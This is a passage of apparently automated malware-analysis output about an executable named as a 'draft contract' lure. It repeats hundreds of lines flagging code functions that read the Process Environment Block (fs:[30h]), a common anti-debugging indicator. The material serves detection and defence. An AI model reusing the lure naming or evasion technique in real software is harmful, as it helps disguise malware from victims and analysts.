                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0274 mov eax, dword ptr fs:[00000030h]2_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]2_2_01704260
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]2_2_01704260
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704260 mov eax, dword ptr fs:[00000030h]2_2_01704260
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D625D mov eax, dword ptr fs:[00000030h]2_2_017D625D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706259 mov eax, dword ptr fs:[00000030h]2_2_01706259
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA250 mov eax, dword ptr fs:[00000030h]2_2_017BA250
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA250 mov eax, dword ptr fs:[00000030h]2_2_017BA250
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01788243 mov eax, dword ptr fs:[00000030h]2_2_01788243
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01788243 mov ecx, dword ptr fs:[00000030h]2_2_01788243
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FA250 mov eax, dword ptr fs:[00000030h]2_2_016FA250
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F823B mov eax, dword ptr fs:[00000030h]2_2_016F823B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]2_2_017102E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]2_2_017102E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102E1 mov eax, dword ptr fs:[00000030h]2_2_017102E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D62D6 mov eax, dword ptr fs:[00000030h]2_2_017D62D6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A2C3 mov eax, dword ptr fs:[00000030h]2_2_0170A2C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102A0 mov eax, dword ptr fs:[00000030h]2_2_017102A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017102A0 mov eax, dword ptr fs:[00000030h]2_2_017102A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov ecx, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017962A0 mov eax, dword ptr fs:[00000030h]2_2_017962A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E284 mov eax, dword ptr fs:[00000030h]2_2_0173E284
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E284 mov eax, dword ptr fs:[00000030h]2_2_0173E284
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]2_2_01780283
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]2_2_01780283
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780283 mov eax, dword ptr fs:[00000030h]2_2_01780283
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]2_2_0173656A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]2_2_0173656A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173656A mov eax, dword ptr fs:[00000030h]2_2_0173656A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708550 mov eax, dword ptr fs:[00000030h]2_2_01708550
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708550 mov eax, dword ptr fs:[00000030h]2_2_01708550
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710535 mov eax, dword ptr fs:[00000030h]2_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E53E mov eax, dword ptr fs:[00000030h]2_2_0172E53E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796500 mov eax, dword ptr fs:[00000030h]2_2_01796500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4500 mov eax, dword ptr fs:[00000030h]2_2_017D4500
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017025E0 mov eax, dword ptr fs:[00000030h]2_2_017025E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E5E7 mov eax, dword ptr fs:[00000030h]2_2_0172E5E7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C5ED mov eax, dword ptr fs:[00000030h]2_2_0173C5ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C5ED mov eax, dword ptr fs:[00000030h]2_2_0173C5ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017065D0 mov eax, dword ptr fs:[00000030h]2_2_017065D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A5D0 mov eax, dword ptr fs:[00000030h]2_2_0173A5D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A5D0 mov eax, dword ptr fs:[00000030h]2_2_0173A5D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E5CF mov eax, dword ptr fs:[00000030h]2_2_0173E5CF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E5CF mov eax, dword ptr fs:[00000030h]2_2_0173E5CF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017245B1 mov eax, dword ptr fs:[00000030h]2_2_017245B1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017245B1 mov eax, dword ptr fs:[00000030h]2_2_017245B1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]2_2_017805A7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]2_2_017805A7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017805A7 mov eax, dword ptr fs:[00000030h]2_2_017805A7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E59C mov eax, dword ptr fs:[00000030h]2_2_0173E59C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01702582 mov eax, dword ptr fs:[00000030h]2_2_01702582
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01702582 mov ecx, dword ptr fs:[00000030h]2_2_01702582
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01734588 mov eax, dword ptr fs:[00000030h]2_2_01734588
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]2_2_0172A470
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]2_2_0172A470
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172A470 mov eax, dword ptr fs:[00000030h]2_2_0172A470
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C460 mov ecx, dword ptr fs:[00000030h]2_2_0178C460
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172245A mov eax, dword ptr fs:[00000030h]2_2_0172245A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA456 mov eax, dword ptr fs:[00000030h]2_2_017BA456
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E443 mov eax, dword ptr fs:[00000030h]2_2_0173E443
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F645D mov eax, dword ptr fs:[00000030h]2_2_016F645D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FC427 mov eax, dword ptr fs:[00000030h]2_2_016FC427
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]2_2_016FE420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]2_2_016FE420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FE420 mov eax, dword ptr fs:[00000030h]2_2_016FE420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786420 mov eax, dword ptr fs:[00000030h]2_2_01786420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]2_2_01738402
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]2_2_01738402
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738402 mov eax, dword ptr fs:[00000030h]2_2_01738402
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017004E5 mov ecx, dword ptr fs:[00000030h]2_2_017004E5
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017344B0 mov ecx, dword ptr fs:[00000030h]2_2_017344B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178A4B0 mov eax, dword ptr fs:[00000030h]2_2_0178A4B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017064AB mov eax, dword ptr fs:[00000030h]2_2_017064AB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BA49A mov eax, dword ptr fs:[00000030h]2_2_017BA49A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708770 mov eax, dword ptr fs:[00000030h]2_2_01708770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710770 mov eax, dword ptr fs:[00000030h]2_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700750 mov eax, dword ptr fs:[00000030h]2_2_01700750
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742750 mov eax, dword ptr fs:[00000030h]2_2_01742750
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742750 mov eax, dword ptr fs:[00000030h]2_2_01742750
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E75D mov eax, dword ptr fs:[00000030h]2_2_0178E75D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01784755 mov eax, dword ptr fs:[00000030h]2_2_01784755
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173674D mov esi, dword ptr fs:[00000030h]2_2_0173674D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173674D mov eax, dword ptr fs:[00000030h]2_2_0173674D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173674D mov eax, dword ptr fs:[00000030h]2_2_0173674D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177C730 mov eax, dword ptr fs:[00000030h]2_2_0177C730
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173273C mov eax, dword ptr fs:[00000030h]2_2_0173273C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173273C mov ecx, dword ptr fs:[00000030h]2_2_0173273C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173273C mov eax, dword ptr fs:[00000030h]2_2_0173273C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C720 mov eax, dword ptr fs:[00000030h]2_2_0173C720
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C720 mov eax, dword ptr fs:[00000030h]2_2_0173C720
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700710 mov eax, dword ptr fs:[00000030h]2_2_01700710
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01730710 mov eax, dword ptr fs:[00000030h]2_2_01730710
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C700 mov eax, dword ptr fs:[00000030h]2_2_0173C700
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017047FB mov eax, dword ptr fs:[00000030h]2_2_017047FB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017047FB mov eax, dword ptr fs:[00000030h]2_2_017047FB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E7E1 mov eax, dword ptr fs:[00000030h]2_2_0178E7E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]2_2_017227ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]2_2_017227ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]2_2_017227ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170C7C0 mov eax, dword ptr fs:[00000030h]2_2_0170C7C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017807C3 mov eax, dword ptr fs:[00000030h]2_2_017807C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B47A0 mov eax, dword ptr fs:[00000030h]2_2_017B47A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017007AF mov eax, dword ptr fs:[00000030h]2_2_017007AF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A678E mov eax, dword ptr fs:[00000030h]2_2_017A678E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01732674 mov eax, dword ptr fs:[00000030h]2_2_01732674
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C866E mov eax, dword ptr fs:[00000030h]2_2_017C866E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C866E mov eax, dword ptr fs:[00000030h]2_2_017C866E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A660 mov eax, dword ptr fs:[00000030h]2_2_0173A660
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A660 mov eax, dword ptr fs:[00000030h]2_2_0173A660
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171C640 mov eax, dword ptr fs:[00000030h]2_2_0171C640
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01736620 mov eax, dword ptr fs:[00000030h]2_2_01736620
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738620 mov eax, dword ptr fs:[00000030h]2_2_01738620
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E627 mov eax, dword ptr fs:[00000030h]2_2_0171E627
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170262C mov eax, dword ptr fs:[00000030h]2_2_0170262C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742619 mov eax, dword ptr fs:[00000030h]2_2_01742619
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E609 mov eax, dword ptr fs:[00000030h]2_2_0177E609
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017806F1 mov eax, dword ptr fs:[00000030h]2_2_017806F1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017806F1 mov eax, dword ptr fs:[00000030h]2_2_017806F1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0173A6C7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A6C7 mov eax, dword ptr fs:[00000030h]2_2_0173A6C7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017366B0 mov eax, dword ptr fs:[00000030h]2_2_017366B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C6A6 mov eax, dword ptr fs:[00000030h]2_2_0173C6A6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704690 mov eax, dword ptr fs:[00000030h]2_2_01704690
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704690 mov eax, dword ptr fs:[00000030h]2_2_01704690
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A4978 mov eax, dword ptr fs:[00000030h]2_2_017A4978
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A4978 mov eax, dword ptr fs:[00000030h]2_2_017A4978
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C97C mov eax, dword ptr fs:[00000030h]2_2_0178C97C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]2_2_01726962
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]2_2_01726962
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]2_2_01726962
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E mov eax, dword ptr fs:[00000030h]2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E mov edx, dword ptr fs:[00000030h]2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E mov eax, dword ptr fs:[00000030h]2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4940 mov eax, dword ptr fs:[00000030h]2_2_017D4940
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780946 mov eax, dword ptr fs:[00000030h]2_2_01780946
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178892A mov eax, dword ptr fs:[00000030h]2_2_0178892A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0179892B mov eax, dword ptr fs:[00000030h]2_2_0179892B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C912 mov eax, dword ptr fs:[00000030h]2_2_0178C912
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8918 mov eax, dword ptr fs:[00000030h]2_2_016F8918
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8918 mov eax, dword ptr fs:[00000030h]2_2_016F8918
